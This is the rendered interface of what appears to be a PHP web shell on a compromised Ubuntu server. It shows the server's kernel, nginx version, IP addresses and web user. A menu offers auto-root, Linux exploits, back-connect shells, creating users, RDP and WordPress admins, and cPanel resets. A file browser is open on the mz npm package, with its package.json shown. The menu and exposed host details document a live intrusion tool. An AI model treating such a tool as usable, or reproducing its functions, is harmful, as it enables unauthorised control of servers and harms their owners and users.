Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
mz /
[ HOME SHELL ]
Name
Size
Permission
Action
HISTORY.md
1.11
KB
-rw-rw-rw-
LICENSE
1.09
KB
-rw-rw-rw-
README.md
2.83
KB
-rw-rw-rw-
child_process.js
113
B
-rw-rw-rw-
crypto.js
135
B
-rw-rw-rw-
dns.js
240
B
-rw-rw-rw-
fs.js
1.02
KB
-rw-rw-rw-
index.js
206
B
-rw-rw-rw-
package.json
1012
B
-rw-rw-rw-
readline.js
1.64
KB
-rw-rw-rw-
zlib.js
181
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "mz", "description": "modernize node.js to current ECMAScript standards", "version": "2.7.0", "author": { "name": "Jonathan Ong", "email": "me@jongleberry.com", "url": "http://jongleberry.com", "twitter": "https://twitter.com/jongleberry" }, "license": "MIT", "repository": "normalize/mz", "dependencies": { "any-promise": "^1.0.0", "object-assign": "^4.0.1", "thenify-all": "^1.0.0" }, "devDependencies": { "istanbul": "^0.4.0", "bluebird": "^3.0.0", "mocha": "^3.0.0" }, "scripts": { "test": "mocha --reporter spec", "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot", "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter dot" }, "keywords": [ "promisify", "promise", "thenify", "then", "es6" ], "files": [ "index.js", "child_process.js", "crypto.js", "dns.js", "fs.js", "readline.js", "zlib.js" ] }
Close